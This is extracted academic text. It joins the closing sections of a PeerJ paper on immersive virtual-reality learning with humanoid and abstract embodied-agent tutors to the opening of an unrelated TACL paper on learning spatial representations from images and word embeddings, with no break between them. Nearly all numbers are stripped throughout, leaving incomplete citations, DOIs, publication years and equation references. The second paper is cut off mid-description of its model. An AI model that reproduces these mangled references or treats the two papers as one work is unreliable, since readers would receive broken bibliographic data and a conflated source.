although measures were taken to provide the humanoid tutor with a realistic appearance and behaviour, such as using deictic gestures and a natural human voice (atkinson, mayer & merrill, ; baylor, ; baylor & ryu, ; janse, ), the avatar was not equipped with any animations which replicated changing facial expressions. this may have hindered the level of satisfaction and engagement the humanoid tutor was able to evoke in the learners, which is known to influence perceived realism (atkinson, ). in our study, many participants exposed to the humanoid tutor commented on the absence of facial expression, with the majority of participants feeling as though it had ‘strange’ and ‘repetitive movement’. in contrast, participants did not have pre-defined expectations of how the abstract tutor should behave and as such it was not susceptible to the uncanny valley effect, unlike the humanoid avatar (bailenson et al., ; mori, ). therefore, rather than the humanoid tutor increasing motivation, participants may have found the abstract tutor more appealing. this mismatch between learner expectations of the tutor and reality may have been detrimental to the perceived co- presence (bailenson et al., ). therefore, it is possible that a lack of emotional expression in the humanoid avatar contributed to the absence of significantly greater learner satisfaction and engagement. previous research has indicated that ea tutors affect learning outcomes indirectly by influencing learner motivation (baylor, ). research suggests greater likeability, and ascribed intelligence when using a humanoid ea tutor (king & ohya, ; fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lester & stone, ); therefore, we expected the humanoid tutor would increase levels of learner motivation. however, there was no statistically significant difference in learner motivation between the humanoid and abstract tutor groups immersed in the vle. bf analysis suggests that the data are almost equally likely to be explained by either the null or the alternative hypothesis. thus, we do not rule out the possibility that tutor appearance can affect motivation. a distinct strength of our study is the control for immersion as a factor which could influence the efficacy of ives, as the more immersive the environment the more comparable it is thought to be to real-world environments. to determine if learning outcomes are affected by immersion a virtual-presence questionnaire was used. the results indicated similarly high levels of immersion in all three ives, meaning that the ives are comparable to non-virtual learning (peperkorn, diemer & mühlberger, ; shin, ) and ensuring that environment quality was unlikely to produce any differences in learning outcomes. future work while this pilot study provides preliminary support for the use of ives by demonstrating that learning within an ive is not significantly different to non-virtual learning, this is only demonstrated in the immediate short-term as the test and outcome measures were administered immediately after the learning experience. for effective distance learning applications, long-term outcomes need to be assessed, perhaps in the realm of a longitudinal study. future work should consider incorporating additional follow-up assessment periods, in order to provide evidence for whether the performance outcomes observed in the ive and the non-virtual classroom are maintained over a longer period of time. 
in this preliminary study recruitment was restricted to the student population at the university, however it is likely that large differences in learning styles and ability will vary within this population resulting in a large range of scores in all conditions. future studies using a larger sample-size should consider the prior grades of all participants, and use random allocation to minimise the effects of individual differences. additionally, the present study highlights the need for further investigation into the impact of eas in ives to understand the varying results surrounding their impact on learner performance, motivation, and satisfaction. previous work has highlighted the impact of graphical realism on peoples’ perceptions of avatars in virtual environments while engaging in various tasks in various scenarios (tessier et al., ; kang, watt & ala, ; lugrin et al., ). our goal was to assess the importance of a humanoid avatar, not necessarily the physical realisation of said avatar. future work may consider graphical fidelity and realism as a factor in learner motivation, presence, and satisfaction and engagement with the learning experience. a possible trend in the literature is based around the age of participants, with younger participants seemingly more likely to be influenced by the presence of an ea. future research should seek to investigate this theory. fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the present study there was no verbal interaction allowed between participants and the tutor in all learning conditions in order to remove the likelihood of differing levels of social interaction between participants and the tutor becoming a confounding variable. furthermore, the ea was not equipped with any facial animation to replicate changing expression, both of which likely had a negative impact on the perceived realism. future work investigating learner satisfaction, engagement, and motivation should consider introducing eas with changing expressions and allow verbal interaction, such as the ability to ask the tutor questions, as this may better simulate student-tutor relationships and have a greater impact upon perceived co-presence, producing more insightful results regarding the role of ea tutors within ives. it may also reduce the strangeness reported in “discussion” as the avatar’s behaviour is improved. finally, we highlight a novel avenue for future research: whether the influence of an ea on learning outcomes are mediated by their relevance to the learning material itself. in our study, participants studied fabricated information about an alien species, hence the abstract tutor may be more salient in this context, promoting interest in the learning material to a greater extent than the humanoid tutor (maldonado & nass, ). future work will assess the link between learning material and the ea tutor’s appearance, as well as its contextual relevance and form within the ive. conclusions to the best of our knowledge, this pilot study is the first to directly compare informational- learning in a traditional classroom to a virtual replica using immersive vr for groups of participants in a controlled, laboratory setting. our findings suggest that learner performance is equivalent in both learning situations. it remains unclear how the design of the ive might impact learning outcomes, in particular whether the presence and appearance of the virtual tutor plays a role in learning outcomes. 
we have discussed avenues for future work, building on our preliminary study and exploring other factors which may impact learning performance in ives as well as guidelines and recommendations for how to design future experiments which control for extraneous variables. there are important implications for developers of distance learning applications: by providing ives opposed to video-based applications, it is possible to reduce the issues with current distance learning platforms and achieve comparable performance levels with those who learn in a traditional classroom, making it possible to cater for increasing numbers of students. as academic and corporate education moves towards ives under increasing pressure to meet the demands of growing numbers of students (kauffman, ), the scalability and significant financial incentives they provide while maintaining satisfactory learning outcomes make them an attractive alternative to current video-based distance learning platforms. in addition, the covid- pandemic has also forced institutions to rethink their ability to provide effective blended learning and virtual learning environments for students. ive technology can help to create effective learning environments that are safe for staff and students, and continue to provide high quality learning and teaching. fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding isabel s. fitton’s research is supported in part by the ukri epsrc centre for doctoral training in digital entertainment (cde), ep/l / . daniel j. finnegan thanks the school of computer science & informatics at cardiff university for their continued support. michael j. proulx is a member of the real and virtual environments augmentation labs (reveal) research centre, the ukri centre for the analysis of motion, entertainment research and applications . (ep/t / ), and the ukri centre for doctoral training in art-ai in computer science at the university of bath. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: ukri epsrc centres: ep/l / and ep/t / . school of computer science & informatics at cardiff university. real and virtual environments augmentation labs (reveal) research centre. competing interests the authors declare that they have no competing interests. author contributions � isabel s. fitton conceived and designed the experiments, performed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � daniel j. finnegan conceived and designed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � michael j. proulx conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the university of bath psychology research ethics committee granted approval to carry out this study (approval number - ). data availability the following information was supplied regarding data availability: the raw data is available in the supplemental files. fitton et al. ( ), peerj comput. sci., doi . 
/peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references alseid m, rigas d. . three different modes of avatars as virtual lecturers in e-learning interfaces: a comparative usability study. open virtual reality journal ( ): – doi . / x . ashby plant e, baylor al, doerr ce, rosenberg-kima rb. . changing middle-school students’ attitudes and performance regarding engineering with computer-based social models. computers & education ( ): – doi . /j.compedu. . . . atkinson r. . optimizing learning from examples using animated pedagogical agents. journal of educational psychology ( ): – doi . / - . . . . atkinson rk, mayer re, merrill mm. . fostering social agency in multimedia learning: examining the impact of an animated agent’s voice. contemporary educational psychology ( ): – doi . /j.cedpsych. . . . bailenson jn, swinth k, hoyt c, persky s, dimov a, blascovich j. . the independent and interactive effects of embodied-agent appearance and behavior on self-report, cognitive, and behavioral markers of copresence in immersive virtual environments. presence: teleoperators and virtual environments ( ): – doi . / . baylor al. . the design of motivational agents and avatars. educational technology research and development ( ): – doi . /s - - - . baylor al, kim s. . designing nonverbal communication for pedagogical agents: when less is more. computers in human behavior ( ): – doi . /j.chb. . . . baylor al, kim y. . pedagogical agent design: the impact of agent realism, gender, ethnicity, and instructional role. in: lester jc, vicari rm, paraguaçu f, eds. intelligent tutoring systems, lecture notes in computer science. berlin heidelberg: springer, – . baylor al, ryu j. . the effects of image and animation in enhancing pedagogical agent persona. journal of educational computing research ( ): – doi . /v wq-nwgn-jb -fat . baylor amy l. . promoting motivation with virtual agents and avatars: role of visual presence and appearance. philosophical transactions of the royal society b: biological sciences ( ): – doi . /rstb. . . bush m. . a multiple choice test that rewards partial knowledge. journal of further and higher education ( ): – doi . / . caro v, carter b, dagli s, schissler m, millunchick j. . can virtual reality enhance learning: a case study in materials science. in: ieee frontiers in education conference (fie), – . chen s. . research on the application of virtual reality in remote education based on the example of mooc. in: th international conference on service systems and service management (icsssm), – . clow d. . moocs and the funnel of participation. in: proceedings of the third international conference on learning analytics and knowledge, lak ’ , new york: acm, – . crook c, schofield l. . the video lecture. internet and higher education : – doi . /j.iheduc. . . . fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / x http://dx.doi.org/ . /j.compedu. . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /j.cedpsych. . . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /v wq-nwgn-jb -fat http://dx.doi.org/ . /rstb. . http://dx.doi.org/ . 
/ http://dx.doi.org/ . /j.iheduc. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ darves c, oviatt s, coulston r. . the impact of auditory embodiment on animated character design. in: proceedings of the international joint conference on autonomous agents and multi-agent systems, embodied agents workshop. davies p. . there’s no confidence in multiple-choice testing. loughborough university. available at https://repository.lboro.ac.uk/articles/_there_s_no_confidence_in_multiple- choice_testing__/ (accessed november ). didehbani n, allen t, kandalaft m, krawczyk d, chapman s. . virtual reality social cognition training for children with high functioning autism. computers in human behavior : – doi . /j.chb. . . . dienes z. . bayesian versus orthodox statistics: which side are you on? perspectives on psychological science ( ): – doi . / . faul f, erdfelder e, lang a-g, buchner a. . g*power : a flexible statistical power analysis program for the social, behavioral, and biomedical sciences. behavior research methods ( ): – doi . /bf . feng y, chen d, zhao z, chen h, xi p. . the impact of students and tas’ participation on students’ academic performance in mooc. in: proceedings of the ieee/acm international conference on advances in social networks analysis and mining , asonam ’ , new york: acm, – . freina l, ott m. . a literature review on immersive virtual reality in education: state of the art and perspectives. in: elearning and software for education (else)bucharest, . freitas a, paredes j. . understanding the faculty perspectives influencing their innovative practices in moocs/spocs: a case study. international journal of educational technology in higher education ( ): doi . /s - - - . graesser ac, chipman p, haynes bc, olney a. . autotutor: an intelligent tutoring system with mixed-initiative dialogue. ieee transactions on education ( ): – doi . /te. . . greenwald sw, kulik a, kunert a, beck s, fröhlich b, cobb s, parsons s, newbutt n, gouveia c, cook c, snyder a, payne s, holland j, buessing s, fields g, corning w, lee v, xia l, maes p. . technology and applications for collaborative learning in virtual reality. in: making a difference: prioritizing equity and access in cscl, th international conference on computer supported collaborative learning (cscl), – . hasegawa d, uğurlu y, sakuta h. . a human-like embodied agent learning tour guide for e-learning systems. in: ieee global engineering education conference (educon), – . hecke tv. . power study of anova versus kruskal-wallis test. journal of statistics and management systems ( – ): – doi . / . . . heeter c. . being there: the subjective experience of presence. presence: teleoperators and virtual environments ( ): – doi . /pres. . . . . janse e. . time-compressing natural and synthetic speech. in: proceedings of the th international conference on spoken language processing. jarosz a, wiley j. . what are the odds? a practical guide to computing and reporting bayes factors. journal of problem solving ( ): – . johnson wl, rickel j. . steve: an animated pedagogical agent for procedural training in virtual environments. acm sigart bulletin ( – ): – doi . / . . joo yj, so h-j, kim nh. . examination of relationships among students’ self-determination, technology acceptance, satisfaction, and continuance intention to use k-moocs. computers & education : – doi . /j.compedu. . . . fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://repository.lboro.ac.uk/articles/_there_s_no_confidence_in_multiple-choice_testing__/ https://repository.lboro.ac.uk/articles/_there_s_no_confidence_in_multiple-choice_testing__/ http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . / http://dx.doi.org/ . /bf http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /te. . http://dx.doi.org/ . / . . http://dx.doi.org/ . /pres. . . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.compedu. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kang s-h, watt jh, ala sk. . communicators’ perceptions of social presence as a function of avatar realism in small display mobile communication devices. in: proceedings of the st annual hawaii international conference on system sciences (hicss ), . kaplan am, haenlein m. . higher education and the digital revolution: about moocs, spocs, social media, and the cookie monster. business horizons ( ): – doi . /j.bushor. . . . kauffman h. . a review of predictive factors of student success in and satisfaction with online learning—alt open access repository. research in learning technology : doi . /rlt.v . . king wj, ohya j. . the representation of agents: anthropomorphism, agency, and intelligence. in: conference companion on human factors in computing systems, chi ’ , new york: acm, – . korallo l. . use of virtual reality environments to improve the learning of historical chronology. phd thesis. middlesex university, hendon, london, uk. lessick s, kraft m. . facing reality: the growth of virtual reality and health sciences libraries. journal of the medical library association ( ): – doi . /jmla. . . lester jc, stone ba. . increasing believability in animated pedagogical agents. in: proceedings of the first international conference on autonmous agents, new york: association for computing machinery, vol. . lester jc, stone ba, stelling gd. . lifelike pedagogical agents for mixed-initiative problem solving in constructivist learning environments. user modeling and user-adapted interaction ( ): – doi . /a: . lin l, parmar d, babu sv, leonard ae, daily sb, jörg s. . how character customization affects learning in computational thinking. in: proceedings of the acm symposium on applied perception, sap ’ , new york: acm, : – : . lugrin j-l, wiedemann m, bieberstein d, latoschik me. . influence of avatar realism on stressful situation in vr. in: ieee virtual reality (vr), – . madden j, pandita s, schuldt jp, kim b, won as, holmes ng. . ready student one: exploring the predictors of student learning in virtual reality. plos one ( ):e doi . /journal.pone. . maldonado h, nass c. . emotive characters can make learning more productive and enjoyable: it takes two to learn to tango. educational technology ( ): – . martha asd, santoso hb. . the design and impact of the pedagogical agent: a systematic literature review. journal of educators online ( ): . merchant z, goetz et, cifuentes l, keeney-kennicutt w, davis tj. . effectiveness of virtual reality-based instruction on students’ learning outcomes in k- and higher education: a meta- analysis. computers & education : – doi . /j.compedu. . . . misbhauddin m. . vredu: a framework for interactive immersive lectures using virtual reality. in: st saudi computer society national computer conference (ncc), – . mori m. . on the uncanny valley. energy ( ): – . moro c, stromberga z, stirling a. . 
virtualisation devices for student learning: comparison between desktop-based (oculus rift) and mobile-based (gear vr) virtual reality in medical and health science education. australasian journal of educational technology ( ): doi . /ajet. . fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.bushor. . . http://dx.doi.org/ . /rlt.v . http://dx.doi.org/ . /jmla. . http://dx.doi.org/ . /a: http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.compedu. . . http://dx.doi.org/ . /ajet. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nemer d, o’neill j. . rethinking moocs: the promises for better education in india. international journal of information communication technologies and human development ( ): – . novick d, afravi m, camacho a, rodriguez a, hinojos l. . pedagogical-agent learning companions in a virtual reality educational experience. in: zaphiris p, ioannou a, eds. learning and collaboration technologies. ubiquitous and virtual environments for learning and collaboration, lecture notes in computer science. cham: springer international publishing, – . nowak kl. . the influence of anthropomorphism and agency on social judgment in virtual environments. journal of computer: mediated communication ( ) doi . /j. - . .tb .x. peperkorn hm, diemer j, mühlberger a. . temporal dynamics in the relation between presence and fear in virtual reality. computers in human behavior : – doi . /j.chb. . . . pirker j, lesjak i, parger m, gütl c. . an educational physics laboratory in mobile versus room scale virtual reality: a comparative study. in: auer me, zutin dg, eds. online engineering & internet of things, lecture notes in networks and systems. new york: springer international publishing, – . psotka j. . immersive training systems: virtual reality and education and training. instructional science ( ): – doi . /bf . rajeswaran p, hung n, kesavadas t, vozenilek j, kumar p. . airwayvr: learning endotracheal intubation in virtual reality. in: ieee conference on virtual reality and d user interfaces (vr), – . rosé cp, carlson r, yang d, wen m, resnick l, goldman p, sherer j. . social factors that contribute to attrition in moocs. in: proceedings of the first acm conference on learning @ scale conference—l@s ’ , atlanta: acm press, – . rosenberg-kima rb, baylor al, plant ea, doerr ce. . the importance of interface agent visual presence: voice alone is less effective in impacting young women’s attitudes toward engineering. in: de kort y, ijsselsteijn w, midden c, eggen b, fogg bj, eds. persuasive technology, lecture notes in computer science. berlin heidelberg: springer, – . roussou m, oliver m, slater m. . the virtual playground: an educational virtual reality environment for evaluating interactivity and conceptual learning. virtual reality ( ): – doi . /s - - - . scaife m, rogers y. . informing the design of a virtual environment to support learning in children. international journal of human: computer studies ( ): – doi . /ijhc. . . schönwetter dj, clifton ra, perry rp. . content familiarity: differential impact of effective teaching on student achievement outcomes. research in higher education ( ): – doi . /a: . schrader c, bastiaens t. . learning in educational computer games for novices: the impact of support provision types on virtual presence, cognitive load, and learning outcomes. international review of research in open and distributed learning ( ): – doi . /irrodl.v i . . schut mj, van der stoep n, fabius jh, van der stigchel s. . 
feature integration is unaffected by saccade landing point, even when saccades land outside of the range of regular oculomotor variance. journal of vision ( ): doi . / . . . fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ijhc. . http://dx.doi.org/ . /a: http://dx.doi.org/ . /irrodl.v i . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ shin d. . empathy and embodied experience in virtual environment: to what extent can virtual reality stimulate empathy and embodied experience? computers in human behavior : – doi . /j.chb. . . . short j, williams e, christie b. . the social psychology of telecommunications. hoboken: john wiley & sons. sitzmann t. . a meta-analytic examination of the instructional effectiveness of computer- based simulation games. personnel psychology ( ): – doi . /j. - . . .x. sneddon j, barlow g, bradley s, brink a, chandy sj, nathwani d. . development and impact of a massive open online course (mooc) for antimicrobial stewardship. journal of antimicrobial chemotherapy ( ): – doi . /jac/dkx . soliman m, guetl c. . intelligent pedagogical agents in immersive virtual learning environments: a review. in: the rd international convention mipro, – . sträfling n, fleischer i, polzer c, leutner d, krämer nc. . teaching learning strategies with a pedagogical agent. journal of media psychology ( ): – doi . / - /a . tessier m-h, gingras c, robitaille n, jackson pl. . toward dynamic pain expressions in avatars: perceived realism and pain level of different action unit orders. computers in human behavior : – doi . /j.chb. . . . tsaramirsis g, buhari sm, al-shammari ko, ghazi s, nazmudeen ms, tsaramirsis k. . towards simulation of the classroom learning experience: virtual reality approach. in: rd international conference on computing for sustainable global development (indiacom), – . wagenmakers e-j, love j, marsman m, jamil t, ly a, verhagen j, selker r, gronau qf, dropmann d, boutin b, meerhoff f, knight p, raj a, van kesteren e-j, van doorn j, Šmíra m, epskamp s, etz a, matzke d, de jong t, van den bergh d, sarafoglou a, steingroever h, derks k, rouder jn, morey rd. . bayesian inference for psychology. part ii: example applications with jasp. psychonomic bulletin & review ( ): – doi . /s - - - . wise a, chang j, duffy t, del valle r. . the effects of teacher social presence on student satisfaction, engagement, and learning. journal of educational computing research ( ): – doi . /v lb- m -rnr -y u . witmer bg, singer mj. . measuring presence in virtual environments: a presence questionnaire. presence: teleoperators and virtual environments ( ): – doi . / . yang d, sinha t, adamson d, penstein rose c. . turn on, tune in, drop out: anticipating student dropouts in massive open online courses. in: proceedings of the nips data-driven education workshop. vol. . fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /jac/dkx http://dx.doi.org/ . / - /a http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /v lb- m -rnr -y u http://dx.doi.org/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
immersive virtual environments and embodied agents for e-learning applications introduction materials and methods analysis and results discussion conclusions references
learning representations specialized in spatial knowledge: leveraging language and vision guillem collell department of computer science ku leuven heverlee, belgium gcollell@kuleuven.be marie-francine moens department of computer science ku leuven heverlee, belgium sien.moens@cs.kuleuven.be abstract spatial understanding is crucial in many real-world problems, yet little progress has been made towards building representations that capture spatial knowledge. here, we move one step forward in this direction and learn such representations by leveraging a task that consists of predicting continuous d spatial arrangements of objects given object-relationship-object instances (e.g., "cat under chair") and a simple neural network model that learns the task from annotated images. we show that the model succeeds in this task and, furthermore, that it is capable of predicting correct spatial arrangements for unseen objects if either cnn features or word embeddings of the objects are provided. the differences between visual and linguistic features are discussed. next, to evaluate the spatial representations learned in the previous task, we introduce a task and a dataset consisting of a set of crowdsourced human ratings of spatial similarity for object pairs. we find that both cnn (convolutional neural network) features and word embeddings predict human judgments of similarity well and that these vectors can be further specialized in spatial knowledge if we update them when training the model that predicts spatial arrangements of objects. overall, this paper paves the way towards building distributed spatial representations, contributing to the understanding of spatial expressions in language. introduction representing spatial knowledge is instrumental in any task involving text-to-scene conversion such as robot understanding of natural language commands (guadarrama et al., ; moratz and tenbrink, ) or a number of robot navigation tasks. despite recent advances in building specialized representations in domains such as sentiment analysis (tang et al., ), semantic similarity/relatedness (kiela et al., ) or dependency parsing (bansal et al., ), little progress has been made towards building distributed representations (a.k.a. embeddings) specialized in spatial knowledge. intuitively, one may reasonably expect that the more attributes two objects share (e.g., size, functionality, etc.), the more likely they are to exhibit similar spatial arrangements with respect to other objects. leveraging this intuition, we foresee that visual and linguistic representations can be spatially informative about unseen objects as they encode features/attributes of objects (collell and moens, ). for instance, without having ever seen an "elephant" before, but only a "horse", one would probably imagine the "elephant" carrying the "human" rather than the other way around, just by considering their size attribute. similarly, one can infer that a "tablet" and a "book" will show similar spatial patterns (usually on a table, in someone's hands, etc.) although they barely show any visual resemblance, yet they are similar in size and functionality. in this paper we systematically study how informative visual and linguistic features, in the form of convolutional neural network (cnn) features and word embeddings, are about the spatial behavior of objects. an important goal of this work is to learn distributed representations specialized in spatial knowledge.
as a vehicle to learn spatial representations, transactions of the association for computational linguistics, vol. , pp. – , . action editor: stefan riezler. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. we leverage the task of predicting the d spatial ar- rangement for two objects under a relationship ex- pressed by either a preposition (e.g., “below” or “on”) or a verb (e.g., “riding”, “jumping”, etc.). for that, we make use of images where both objects are annotated with bounding boxes. for instance, in an image depicting (horse, jumping, fence) we reason- ably expect to find the “horse” above the “fence”. to learn the task, we employ a feed forward network that represents objects as continuous (spatial) fea- tures in an embedding layer and guides the learning with a distance-based supervision on the objects’ co- ordinates. we show that the model fares well in this task and that by informing it with either word em- beddings or cnn features it is able to output accu- rate predictions about unseen objects, e.g., predict- ing the spatial arrangement of (man, riding, bike) without having ever been exposed to a “bike” be- fore. this result suggests that the semantic and vi- sual knowledge carried by the visual and linguistic features correlates to a certain extent with the spatial properties of words, thus providing predictive power for unseen objects. to evaluate the quality of the spatial representa- tions learned in the previous task, we introduce a task consisting in a set of , human ratings of spatial similarity between object pairs. it is thus de- sirable for spatial representations that “spatially sim- ilar” objects (i.e., objects that are arranged spatially similar in most situations and relative to other ob- jects) have similar embeddings. in these ratings we show, first, that both cnn features and word em- beddings are good predictors of human judgments, and second, that these vectors can be further spe- cialized in spatial knowledge if we update them by backpropagation when learning the model in the task of predicting spatial arrangements of objects. the rest of the paper is organized as follows. in sect. we review related research. in sect. we describe two spatial tasks and a model. in sect. we describe our experimental setup. in sect. we present and discuss our results. finally, in sect. we summarize our contributions. related work contrary to earlier rule-based approaches to spatial understanding (kruijff et al., ; moratz and ten- brink, ), malinowski and fritz ( ) propose a learning-based method that learns the parameters of “spatial templates” (or regions of acceptability of an object under a spatial relation) using a pool- ing approach. they show improved performance in image retrieval and image annotation (i.e., retriev- ing sentences given a query image) over previous rule-based systems and methods that rely on hand- crafted templates. contrary to us, they restrict to relationships expressed by explicit spatial preposi- tions (e.g., “on” or “below”) while we also consider actions (e.g., “jumping”). furthermore, they do not build spatial representations for objects. other approaches have shown the value of prop- erly integrating spatial information into a variety of tasks. for example, shiang et al. 
( ) improve over the state-of-the-art object recognition by lever- aging previous knowledge of object co-occurrences and relative positions of objects—which they mine from text and the web—in order to rank possible object detections. in a similar fashion, lin and parikh ( ) leverage common sense visual knowl- edge (e.g., object locations and co-occurrences) in two tasks: fill-in-the-blank and visual paraphrasing. they compute the likelihood of a scene to identify the most likely answer to multiple-choice textual scene descriptions. in contrast, we focus solely on spatial information rather than semantic plausibility. moreover, our primary target is to build (spatial) rep- resentations. alternatively, elliott and keller ( ) annotate geometric relationships between objects in images (e.g., they add an “on” link between “man” and “bike” in an image of a “man” “riding” a “bike”) to better infer the action present in the image. for instance, if the “man” is next to the bike one can infer that the action “repairing” is more likely than “riding” in this image. accounting for this extra spatial structure allows them to outperform bag-of- features methods in an image captioning task. in contrast with those who restrict to a small domain of actions (e.g., “taking a photo”, “riding”, etc.), our goal is to generalize to any unseen/rare objects and actions by learning from frequent spatial config- urations and objects, and critically, leveraging rep- resentations of objects. recent work (collell et al., ) tackles the research question of whether rel- ative spatial arrangements can be predicted equally well from actions (e.g., “riding”) than from spatial prepositions (e.g., “below”), and how to interpret the learned weights of the network. in contrast, our research questions concern spatial representations. crucially, none of the studies above have consid- ered or attempted to learn distributed spatial repre- sentations of objects, nor studied how much spatial knowledge is contained in visual and linguistic rep- resentations. the existence of quantitative, continuous spatial representations of objects has been formerly dis- cussed, yet to our knowledge, not systematically in- vestigated before. for instance, forbus et al. ( ) conjectured that “there is no purely qualitative, gen- eral purpose representation of spatial properties”, further emphasizing that the quantitative component is strictly necessary. it is also worth commenting on early work aimed at enhancing the understanding of natural spatial language such as the l project (feldman et al., ). in the context of this project, regier ( ) proposed a connectionist model that learns to predict a few spatial prepositions (“above”, “below”, “left”, “right”, “in”, “out”, “on”, and “off”) from low reso- lution videos containing a limited set of toy objects (circle, square, etc.). in contrast, we consider an un- limited vocabulary of real-world objects, and we do not restrict to spatial prepositions but we include ac- tions, as well. hence, regier’s ( ) setting does not seem plausible to deal with actions given that, in contrast to the spatial prepositions that they use, which are mutually exclusive (an object cannot be “above” and simultaneously “below” another ob- ject), actions are not. in particular, actions exhibit large spatial overlap and, therefore, attempt to pre- dict thousands of different actions from the relative locations of the objects seems infeasible. 
addition- ally, regier’s ( ) architecture does not allow to meaningfully extract representations of objects from the visual input—which yields rather visual features. here, we propose an ad hoc setting for both, learning and evaluating spatial representations. in particular, instead of learning to predict spatial rela- tions from visual input as in regier’s ( ) work, we learn the reverse direction, i.e., to map the rela- tion (and two objects) to their visual spatial arrange- ment. by backpropagating the embeddings of the objects while learning the task, we enable learning spatial representations. as a core finding, we show in an ad hoc task, namely our collected human rat- ings of spatial similarity, that the learned features are more specialized in spatial knowledge than the cnn features and word embeddings that were used to initialize the parameters of the embeddings. tasks and model here, we first describe the prediction task and model that we use to learn the spatial representations. we subsequently present the spatial similarity task which is employed to evaluate the quality of the learned representations. . prediction task to evaluate the ability of a model or embeddings to learn spatial knowledge, we employ the task of pre- dicting the spatial location of an object (“o”) rela- tive to a subject (“s”) under a relationship (“r”). let oc = (ocx,o c y) denote the coordinates of the center (“c”) of the object’s bounding box, where ocx ∈ r and ocy ∈ r are its x and y compo- nents. let ob = (obx,o b y) be one half of the ver- tical (oby ∈ r) and horizontal (obx ∈ r) sizes of the object’s bounding box (“b”). a similar notation ap- plies to the subject (i.e., sc and sb), and we denote model predictions with a hat ôc, ôb. the task is to learn a mapping from the structured textual input (subject, relation, object)—abbreviated by (s, r, o)—to the output consisting of the object’s center coordinates oc and its size ob (see fig. ). we notice that a “subject” is not necessarily a syntactic subject but simply a convenient notation to accommodate the case where the relationship (r) is an action (e.g., “riding” or “wearing”), while when r is a spatial preposition (e.g., “below” or “on”) the subject simply denotes the referent object. simi- larly, the object is not necessarily a direct object. . regression model following the task above (sect. . ), we con- sider a model (fig. ) that takes a triplet of words (s, r, o) as input and maps their one- we prefer to adhere to the terminology used to express entity-relationships in the visual genome dataset, but are aware of annotation schemes for spatial semantics (pustejovsky et al., ). however, a one-to-one mapping of the visual genome terminology to these annotation schemes is not always possible. re-scale coordinates mirror image (if needed) image pre-processing obj. subj. man walking dog o b j. r e l. s u b j. output: coordinates & size learning (regression) [s c x , s c y ] [s b x , s b y ] original image (with bounding boxes) embedding layer (vis. or lang.) composition layers input (structured text) concatenate sby sbx [scx , scy] subj. obj. [ocx , ocy] obj.o b y obx = [ocx , ocy , obx , oby] figure : overview of the model (right) and the image pre-processing setting (left). hot vectors ws, wr, wo to d-dimensional dense vectors wsws,wrwr,wowo via dot product with their respective embedding matrices ws ∈ rd×|vs|,wr ∈ rd×|vr|,wo ∈ rd×|vo|, where |vs|, |vr|, |vo| are the vocabulary sizes. 
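for reference, the setup just described can be restated compactly (a reconstruction from the definitions above, using the paper's own symbols):

\[ o^c = (o^c_x,\, o^c_y), \qquad o^b = (o^b_x,\, o^b_y), \]
with \(s^c, s^b\) defined analogously for the subject, and the task being the mapping
\[ (s,\, r,\, o) \;\longmapsto\; y = (o^c,\, o^b). \]
the embedding lookups are
\[ W_s \mathbf{w}_s,\; W_r \mathbf{w}_r,\; W_o \mathbf{w}_o \in \mathbb{R}^{d}, \qquad W_s \in \mathbb{R}^{d \times |V_s|},\; W_r \in \mathbb{R}^{d \times |V_r|},\; W_o \in \mathbb{R}^{d \times |V_o|}, \]
where \(\mathbf{w}_s, \mathbf{w}_r, \mathbf{w}_o\) are one-hot vectors.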
